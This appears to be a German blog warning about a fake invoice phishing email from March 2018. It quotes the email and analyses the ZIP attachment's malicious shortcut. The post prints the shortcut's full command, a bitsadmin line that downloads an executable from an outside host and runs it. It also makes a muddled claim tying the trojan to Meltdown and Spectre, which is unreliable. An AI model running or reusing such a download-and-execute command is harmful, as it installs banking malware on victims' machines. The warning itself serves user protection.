Rechnung für die Zahlung -für Herr/Frau Max Mustermann . von Gruen ([email protected]) bringt einen Online-Banking-Trojaner!

Am Sonntag, den 04. März 2018 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in deutscher Sprache versendet. Klicken Sie nicht auf den Link und öffnen Sie nicht die ZIP-Datei! Eine Verknüpfung würde einen Online-Banking-Trojaner nachladen, der anschließend aufgrund von entstehenden Sicherheitslücken von Meltdown und Spectre in den Prozessoren Intel, AMD und ARM unter dem Vorwand eines neuen Verschlüsselungsalgorithmus Geld zu klauen!

Betreff: Rechnung für die Zahlung -für Herr/Frau Max Mustermann .
Absender: Gruen ([email protected])

Bitte zahlen Sie die hier beiliegendeRechnung.

This email was sent to (E-Mail-Adresse)
why did I get this? unsubscribe from this list update subscription preferences
Agent: Grün · Uracher Straße 31 · Metzingen 72555 · Germany

Achtung: Es handelt sich um eine gefälschte E-Mail! Klicken Sie deswegen nicht auf den Link und öffnen Sie nicht das ZIP-Archiv! Es handelt sich nicht um eine Rechnung! Der Name des Absenders wird missbräuchlich verwendet.

Der Link „Rechnung“ bzw. das Icon verlinkt auf die Adresse auf atn-world.net/Rechnung%20fur%20die%20Zahlung.zip, von der ein ZIP-Archiv geladen würde.

Rechnung fur die Zahlung.zip

Das ZIP – Archiv enthält eine Verknüpfung. Klicken Sie nicht darauf, da sonst eine bösartige Software nachgeladen würde!

Diese Verknüpfung würde so aussehen:

%ComSpec% /c „bitsadmin /transfer hhmYERSEEEENTRY /priority foreground http://lan.grandguard.org/hmhGFRywlu.php %TEMP%\hmhGFRywlu.exe > NUL & start %TEMP%\hmhGFRywlu.exe“

Wie man hier sehen kann, soll eine Datei von /lan.grandguard.org/hmhGFRywlu.php geladen und im Temp-Verzeichnis als „hmhGFRywlu.exe“ abgelegt und ausgeführt werden.

Würde man diese Adresse im Browser aufrufen, würde eine Datei geladen:

72128cc32e3e14946b958a8b45ff375e.exe

Laut Virustotal beträgt die Erkennungsrate 11/66!

 

Es handelt sich um die gleiche Betrugswelle, die bereits seit Ende der letzten Woche verbreitet wird. Wie das Trojanische Pferd im Online-Banking Geld klauen möchte, sehen Sie in den Warnungen

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.